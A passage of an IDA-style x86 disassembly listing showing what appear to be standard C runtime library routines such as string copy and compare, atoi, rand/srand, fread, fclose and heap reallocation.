dd offset loc_416728
dd offset loc_416738
dd offset loc_41674C
; ---------------------------------------------------------------------------
loc_416720: ; CODE XREF: sub_416430+1B7�j
; sub_416430:loc_416614�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_416728: ; CODE XREF: sub_416430+1B7�j
; sub_416430:loc_416614�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_416738: ; CODE XREF: sub_416430+1B7�j
; sub_416430:loc_416614�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41674C: ; CODE XREF: sub_416430+1B7�j
; sub_416430:loc_416614�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_416430 endp
; =============== S U B R O U T I N E =======================================
sub_416765 proc near ; CODE XREF: sub_402A3E+34�p
; sub_402A3E+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_415D0A
pop ecx
pop ecx
retn
sub_416765 endp
; =============== S U B R O U T I N E =======================================
sub_416773 proc near ; CODE XREF: sub_4167E0+4�p
arg_0 = dword ptr 4
push esi
push dword_49429C
call sub_41B2F7
mov edx, dword_49429C
pop ecx
mov ecx, dword_494298
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_4167D2
push edx
call sub_41B2F7
add eax, 10h
push eax
push dword_49429C
call sub_416ED2
add esp, 0Ch
test eax, eax
jnz short loc_4167B5
retn
; ---------------------------------------------------------------------------
loc_4167B5: ; CODE XREF: sub_416773+3F�j
mov ecx, dword_494298
sub ecx, dword_49429C
mov dword_49429C, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_494298, ecx
loc_4167D2: ; CODE XREF: sub_416773+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add dword_494298, 4
retn
sub_416773 endp
; =============== S U B R O U T I N E =======================================
sub_4167E0 proc near ; CODE XREF: sub_402B66+1F�p
; sub_4158B1+5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_416773
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_4167E0 endp
; =============== S U B R O U T I N E =======================================
sub_4167F2 proc near ; DATA XREF: .data:00429418�o
push 80h
call sub_415CF8
test eax, eax
pop ecx
mov dword_49429C, eax
jnz short loc_416813
push 18h
call sub_417FC6
mov eax, dword_49429C
pop ecx
loc_416813: ; CODE XREF: sub_4167F2+12�j
and dword ptr [eax], 0
mov eax, dword_49429C
mov dword_494298, eax
retn
sub_4167F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416821 proc near ; CODE XREF: sub_402D46+2D�p
; sub_4034D1+19�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_41AAED
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_416861
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41686E
; ---------------------------------------------------------------------------
loc_416861: ; CODE XREF: sub_416821+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41A9D8
pop ecx
pop ecx
loc_41686E: ; CODE XREF: sub_416821+3E�j
mov eax, esi
pop esi
leave
retn
sub_416821 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416880 proc near ; CODE XREF: sub_402D46+8�p
; .text:00403CC3�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4168A0
loc_41688C: ; CODE XREF: sub_416880+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_41688C
loc_4168A0: ; CODE XREF: sub_416880+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4168B0 proc near ; CODE XREF: sub_4034D1+5C�p
; sub_4034D1+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_416964
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_4168DA
loc_4168CB: ; CODE XREF: sub_4168B0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_41690B
test edi, 3
jnz short loc_4168CB
loc_4168DA: ; CODE XREF: sub_4168B0+19�j
; sub_4168B0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_4168DA
mov eax, [edi-4]
test al, al
jz short loc_416918
test ah, ah
jz short loc_416913
test eax, 0FF0000h
jz short loc_41690E
test eax, 0FF000000h
jnz short loc_4168DA
loc_41690B: ; CODE XREF: sub_4168B0+20�j
dec edi
jmp short loc_41691B
; ---------------------------------------------------------------------------
loc_41690E: ; CODE XREF: sub_4168B0+52�j
sub edi, 2
jmp short loc_41691B
; ---------------------------------------------------------------------------
loc_416913: ; CODE XREF: sub_4168B0+4B�j
sub edi, 3
jmp short loc_41691B
; ---------------------------------------------------------------------------
loc_416918: ; CODE XREF: sub_4168B0+47�j
sub edi, 4
loc_41691B: ; CODE XREF: sub_4168B0+5C�j
; sub_4168B0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_416930
mov ebx, ecx
shr ecx, 2
jnz short loc_41697C
jmp short loc_41694C
; ---------------------------------------------------------------------------
loc_416930: ; CODE XREF: sub_4168B0+75�j
; sub_4168B0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_41696A
mov [edi], dl
inc edi
dec ecx
jz short loc_416960
test esi, 3
jnz short loc_416930
mov ebx, ecx
shr ecx, 2
jnz short loc_41697C
loc_41694C: ; CODE XREF: sub_4168B0+7E�j
; sub_4168B0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_416960
loc_416953: ; CODE XREF: sub_4168B0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_416962
dec ecx
jnz short loc_416953
loc_416960: ; CODE XREF: sub_4168B0+8B�j
; sub_4168B0+A1�j
mov [edi], cl
loc_416962: ; CODE XREF: sub_4168B0+AB�j
pop ebx
pop esi
loc_416964: ; CODE XREF: sub_4168B0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41696A: ; CODE XREF: sub_4168B0+85�j
; sub_4168B0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416974: ; CODE XREF: sub_4168B0+E4�j
; sub_4168B0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_41694C
loc_41697C: ; CODE XREF: sub_4168B0+7C�j
; sub_4168B0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416974
test dl, dl
jz short loc_41696A
test dh, dh
jz short loc_4169C8
test edx, 0FF0000h
jz short loc_4169B8
test edx, 0FF000000h
jnz short loc_416974
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4169B8: ; CODE XREF: sub_4168B0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4169C8: ; CODE XREF: sub_4168B0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4168B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4169E0 proc near ; CODE XREF: sub_403661+2A2�p
; sub_4087B3+22A9�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_416A01
xor eax, eax
jmp short loc_416A03
; ---------------------------------------------------------------------------
loc_416A01: ; CODE XREF: sub_4169E0+1B�j
mov eax, edi
loc_416A03: ; CODE XREF: sub_4169E0+1F�j
cld
pop edi
leave
retn
sub_4169E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416A10 proc near ; CODE XREF: sub_403661+6E�p
; sub_403661+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_416A93
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_416A34
shr ecx, 2
jnz short loc_416AA1
jmp short loc_416A55
; ---------------------------------------------------------------------------
loc_416A34: ; CODE XREF: sub_416A10+1B�j
; sub_416A10+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_416A62
test al, al
jz short loc_416A6A
test esi, 3
jnz short loc_416A34
mov ebx, ecx
shr ecx, 2
jnz short loc_416AA1
loc_416A50: ; CODE XREF: sub_416A10+8F�j
and ebx, 3
jz short loc_416A62
loc_416A55: ; CODE XREF: sub_416A10+22�j
; sub_416A10+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_416A8E
dec ebx
jnz short loc_416A55
loc_416A62: ; CODE XREF: sub_416A10+2B�j
; sub_416A10+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416A6A: ; CODE XREF: sub_416A10+2F�j
test edi, 3
jz short loc_416A84
loc_416A72: ; CODE XREF: sub_416A10+72�j
mov [edi], al
inc edi
dec ecx
jz loc_416B06
test edi, 3
jnz short loc_416A72
loc_416A84: ; CODE XREF: sub_416A10+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_416AF7
loc_416A8B: ; CODE XREF: sub_416A10+7F�j
; sub_416A10+F4�j
mov [edi], al
inc edi
loc_416A8E: ; CODE XREF: sub_416A10+4D�j
dec ebx
jnz short loc_416A8B
pop ebx
pop esi
loc_416A93: ; CODE XREF: sub_416A10+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_416A99: ; CODE XREF: sub_416A10+A9�j
; sub_416A10+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_416A50
loc_416AA1: ; CODE XREF: sub_416A10+20�j
; sub_416A10+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416A99
test dl, dl
jz short loc_416AEB
test dh, dh
jz short loc_416AE1
test edx, 0FF0000h
jz short loc_416AD7
test edx, 0FF000000h
jnz short loc_416A99
mov [edi], edx
jmp short loc_416AEF
; ---------------------------------------------------------------------------
loc_416AD7: ; CODE XREF: sub_416A10+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_416AEF
; ---------------------------------------------------------------------------
loc_416AE1: ; CODE XREF: sub_416A10+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_416AEF
; ---------------------------------------------------------------------------
loc_416AEB: ; CODE XREF: sub_416A10+AD�j
xor edx, edx
mov [edi], edx
loc_416AEF: ; CODE XREF: sub_416A10+C5�j
; sub_416A10+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_416B01
loc_416AF7: ; CODE XREF: sub_416A10+79�j
xor eax, eax
loc_416AF9: ; CODE XREF: sub_416A10+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_416AF9
loc_416B01: ; CODE XREF: sub_416A10+E5�j
and ebx, 3
jnz short loc_416A8B
loc_416B06: ; CODE XREF: sub_416A10+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_416A10 endp
; =============== S U B R O U T I N E =======================================
sub_416B0E proc near ; CODE XREF: .text:00403F34�p
; .text:00405BA4�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_435A90, eax
retn
sub_416B0E endp
; =============== S U B R O U T I N E =======================================
sub_416B18 proc near ; CODE XREF: sub_403B34+4D�p
; sub_403B34+5A�p ...
mov eax, dword_435A90
imul eax, 343FDh
add eax, 269EC3h
mov dword_435A90, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_416B18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B36 proc near ; CODE XREF: sub_403B34+40�p
; .text:00405DB6�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_4158E0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_41B320
add esp, 10h
leave
retn
sub_416B36 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416B70 proc near ; CODE XREF: sub_40448A+1D�p
; sub_405673+43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_416BBC
loc_416B80: ; CODE XREF: sub_416B70+3C�j
; sub_416B70+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_416BB4
or al, al
jz short loc_416BB0
cmp ah, [ecx+1]
jnz short loc_416BB4
or ah, ah
jz short loc_416BB0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_416BB4
or al, al
jz short loc_416BB0
cmp ah, [ecx+3]
jnz short loc_416BB4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_416B80
mov edi, edi
loc_416BB0: ; CODE XREF: sub_416B70+18�j
; sub_416B70+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_416BB4: ; CODE XREF: sub_416B70+14�j
; sub_416B70+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_416BBC: ; CODE XREF: sub_416B70+E�j
test edx, 1
jz short loc_416BD8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_416BB4
inc ecx
or al, al
jz short loc_416BB0
test edx, 2
jz short loc_416B80
loc_416BD8: ; CODE XREF: sub_416B70+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_416BB4
or al, al
jz short loc_416BB0
cmp ah, [ecx+1]
jnz short loc_416BB4
or ah, ah
jz short loc_416BB0
add ecx, 2
jmp short loc_416B80
sub_416B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BF4 proc near ; CODE XREF: sub_404651+19�p
; sub_40E485+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_41AAED
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_416C32
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_416C3F
; ---------------------------------------------------------------------------
loc_416C32: ; CODE XREF: sub_416BF4+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41A9D8
pop ecx
pop ecx
loc_416C3F: ; CODE XREF: sub_416BF4+3C�j
mov eax, esi
pop esi
leave
retn
sub_416BF4 endp
; =============== S U B R O U T I N E =======================================
sub_416C44 proc near ; CODE XREF: sub_416CCF+4�p
; sub_41F1B2+1A2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_416C4C: ; CODE XREF: sub_416C44+34�j
cmp dword_435E38, 1
jle short loc_416C64
movzx eax, byte ptr [edi]
push 8
push eax
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_416C73
; ---------------------------------------------------------------------------
loc_416C64: ; CODE XREF: sub_416C44+F�j
movzx eax, byte ptr [edi]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 8
loc_416C73: ; CODE XREF: sub_416C44+1E�j
test eax, eax
jz short loc_416C7A
inc edi
jmp short loc_416C4C
; ---------------------------------------------------------------------------
loc_416C7A: ; CODE XREF: sub_416C44+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_416C8A
cmp esi, 2Bh
jnz short loc_416C8E
loc_416C8A: ; CODE XREF: sub_416C44+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_416C8E: ; CODE XREF: sub_416C44+44�j
xor ebx, ebx
loc_416C90: ; CODE XREF: sub_416C44+7B�j
cmp dword_435E38, 1
jle short loc_416CA5
push 4
push esi
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_416CB0
; ---------------------------------------------------------------------------
loc_416CA5: ; CODE XREF: sub_416C44+53�j
mov eax, off_435C2C
mov al, [eax+esi*2]
and eax, 4
loc_416CB0: ; CODE XREF: sub_416C44+5F�j
test eax, eax
jz short loc_416CC1
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_416C90
; ---------------------------------------------------------------------------
loc_416CC1: ; CODE XREF: sub_416C44+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_416CCA
neg eax
loc_416CCA: ; CODE XREF: sub_416C44+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_416C44 endp
; =============== S U B R O U T I N E =======================================
sub_416CCF proc near ; CODE XREF: .text:004046BF�p
; .text:0040483D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_416C44
pop ecx
retn
sub_416CCF endp
; ---------------------------------------------------------------------------
push ecx
push ebx
push ebp
push esi
push edi
mov edi, [esp+18h]
loc_416CE3: ; CODE XREF: .text:00416D0F�j
cmp dword_435E38, 1
jle short loc_416CFB
movzx eax, byte ptr [edi]
push 8
push eax
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_416D0A
; ---------------------------------------------------------------------------
loc_416CFB: ; CODE XREF: .text:00416CEA�j
movzx eax, byte ptr [edi]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 8
loc_416D0A: ; CODE XREF: .text:00416CF9�j
test eax, eax
jz short loc_416D11
inc edi
jmp short loc_416CE3
; ---------------------------------------------------------------------------
loc_416D11: ; CODE XREF: .text:00416D0C�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov [esp+10h], esi
jz short loc_416D23
cmp esi, 2Bh
jnz short loc_416D27
loc_416D23: ; CODE XREF: .text:00416D1C�j
movzx esi, byte ptr [edi]
inc edi
loc_416D27: ; CODE XREF: .text:00416D21�j
xor ebx, ebx
xor ebp, ebp
loc_416D2B: ; CODE XREF: .text:00416D76�j
cmp dword_435E38, 1
jle short loc_416D40
push 4
push esi
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_416D4B
; ---------------------------------------------------------------------------
loc_416D40: ; CODE XREF: .text:00416D32�j
mov eax, off_435C2C
mov al, [eax+esi*2]
and eax, 4
loc_416D4B: ; CODE XREF: .text:00416D3E�j
test eax, eax
jz short loc_416D78
lea eax, [esi-30h]
push 0
cdq
mov esi, eax
push 0Ah
push ebp
mov [esp+24h], esi
push ebx
mov esi, edx
call sub_417E10
mov ecx, [esp+18h]
add ecx, eax
adc esi, edx
mov ebx, ecx
mov ebp, esi
movzx esi, byte ptr [edi]
inc edi
jmp short loc_416D2B
; ---------------------------------------------------------------------------
loc_416D78: ; CODE XREF: .text:00416D4D�j
cmp dword ptr [esp+10h], 2Dh
mov eax, ebx
jnz short loc_416D8C
neg eax
mov edx, ebp
adc edx, 0
neg edx
jmp short loc_416D8E
; ---------------------------------------------------------------------------
loc_416D8C: ; CODE XREF: .text:00416D7F�j
mov edx, ebp
loc_416D8E: ; CODE XREF: .text:00416D8A�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_416D94 proc near ; CODE XREF: sub_404A47+64�p
; sub_40636F+7C�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_416DA9
or eax, 0FFFFFFFFh
jmp short loc_416DE3
; ---------------------------------------------------------------------------
loc_416DA9: ; CODE XREF: sub_416D94+E�j
test al, 83h
jz short loc_416DE1
push esi
call sub_41BF5F
push esi
mov edi, eax
call sub_41BEF9
push dword ptr [esi+10h]
call sub_41BE46
add esp, 0Ch
test eax, eax
jge short loc_416DCF
or edi, 0FFFFFFFFh
jmp short loc_416DE1
; ---------------------------------------------------------------------------
loc_416DCF: ; CODE XREF: sub_416D94+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_416DE1
push eax
call sub_415D6C
and dword ptr [esi+1Ch], 0
pop ecx
loc_416DE1: ; CODE XREF: sub_416D94+17�j
; sub_416D94+39�j ...
mov eax, edi
loc_416DE3: ; CODE XREF: sub_416D94+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_416D94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416DEA proc near ; CODE XREF: sub_404A47+45�p
; sub_40636F+4E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_416E0E
xor eax, eax
jmp loc_416EB7
; ---------------------------------------------------------------------------
loc_416E0E: ; CODE XREF: sub_416DEA+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_416E21
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_416E2D
; ---------------------------------------------------------------------------
loc_416E21: ; CODE XREF: sub_416DEA+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_416E2D
; ---------------------------------------------------------------------------
loc_416E2A: ; CODE XREF: sub_416DEA+C4�j
mov ecx, [ebp+arg_0]
loc_416E2D: ; CODE XREF: sub_416DEA+35�j
; sub_416DEA+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_416E5F
mov eax, [esi+4]
test eax, eax
jz short loc_416E5F
cmp ecx, eax
mov edi, ecx
jb short loc_416E44
mov edi, eax
loc_416E44: ; CODE XREF: sub_416DEA+56�j
push edi
push dword ptr [esi]
push ebx
call sub_415960
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_416EAA
; ---------------------------------------------------------------------------
loc_416E5F: ; CODE XREF: sub_416DEA+49�j
; sub_416DEA+50�j
cmp ecx, [ebp+arg_C]
jb short loc_416E92
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_416E75
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_416E75: ; CODE XREF: sub_416DEA+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41C10A
add esp, 0Ch
test eax, eax
jz short loc_416EBC
cmp eax, 0FFFFFFFFh
jz short loc_416EC2
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_416EAA
; ---------------------------------------------------------------------------
loc_416E92: ; CODE XREF: sub_416DEA+78�j
push esi
call sub_41C031
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_416EC6
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_416EAA: ; CODE XREF: sub_416DEA+73�j
; sub_416DEA+A6�j
cmp [ebp+arg_0], 0
jnz loc_416E2A
mov eax, [ebp+arg_8]
loc_416EB7: ; CODE XREF: sub_416DEA+1F�j
; sub_416DEA+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416EBC: ; CODE XREF: sub_416DEA+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_416EC6
; ---------------------------------------------------------------------------
loc_416EC2: ; CODE XREF: sub_416DEA+9F�j
or dword ptr [esi+0Ch], 20h
loc_416EC6: ; CODE XREF: sub_416DEA+B2�j
; sub_416DEA+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_416EB7
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
sub_416ED2 proc near ; CODE XREF: sub_404A47+2E�p
; sub_416773+35�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push ebp
push esi
test ebx, ebx
push edi
jnz short loc_416EED
push [esp+10h+arg_4]
call sub_415CF8
pop ecx
jmp loc_416FED
; ---------------------------------------------------------------------------
loc_416EED: ; CODE XREF: sub_416ED2+A�j
mov esi, [esp+10h+arg_4]
test esi, esi
jnz short loc_416F03
push ebx
call sub_415D6C
pop ecx
loc_416EFC: ; CODE XREF: sub_416ED2+114�j
xor eax, eax
jmp loc_416FED
; ---------------------------------------------------------------------------
loc_416F03: ; CODE XREF: sub_416ED2+21�j
; sub_416ED2+10E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_416FCE
push ebx
call sub_418317
mov ebp, eax
pop ecx
test ebp, ebp
jz loc_416FAB
cmp esi, dword_435AC8
ja short loc_416F6B
push esi
push ebx
push ebp
call sub_418B22
add esp, 0Ch
test eax, eax
jz short loc_416F3A
mov edi, ebx
jmp short loc_416F63
; ---------------------------------------------------------------------------
loc_416F3A: ; CODE XREF: sub_416ED2+62�j
push esi
call sub_41866D
mov edi, eax
pop ecx
test edi, edi
jz short loc_416F6B
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_416F51
mov eax, esi
loc_416F51: ; CODE XREF: sub_416ED2+7B�j
push eax
push ebx
push edi
call sub_415960
push ebx
push ebp
call sub_418342
add esp, 14h
loc_416F63: ; CODE XREF: sub_416ED2+66�j
test edi, edi
jnz loc_416FEB
loc_416F6B: ; CODE XREF: sub_416ED2+53�j
; sub_416ED2+73�j
test esi, esi
jnz short loc_416F72
push 1
pop esi
loc_416F72: ; CODE XREF: sub_416ED2+9B�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_49426C
call ds:dword_495428 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_416FCE
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_416F97
mov eax, esi
loc_416F97: ; CODE XREF: sub_416ED2+C1�j
push eax
push ebx
push edi
call sub_415960
push ebx
push ebp
call sub_418342
add esp, 14h
jmp short loc_416FCA
; ---------------------------------------------------------------------------
loc_416FAB: ; CODE XREF: sub_416ED2+47�j
test esi, esi
jnz short loc_416FB2
push 1
pop esi
loc_416FB2: ; CODE XREF: sub_416ED2+DB�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push 0
push dword_49426C
call ds:dword_495434 ; RtlReAllocateHeap
mov edi, eax
loc_416FCA: ; CODE XREF: sub_416ED2+D7�j
test edi, edi
jnz short loc_416FEB
loc_416FCE: ; CODE XREF: sub_416ED2+36�j
; sub_416ED2+B9�j
cmp dword_49284C, 0
jz short loc_416FEB
push esi
call sub_4181F0
test eax, eax
pop ecx
jnz loc_416F03
jmp loc_416EFC
; ---------------------------------------------------------------------------
loc_416FEB: ; CODE XREF: sub_416ED2+93�j
; sub_416ED2+FA�j ...
mov eax, edi
loc_416FED: ; CODE XREF: sub_416ED2+16�j
; sub_416ED2+2C�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_416ED2 endp
; =============== S U B R O U T I N E =======================================
sub_416FF2 proc near ; CODE XREF: sub_417012+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41C470
test eax, eax
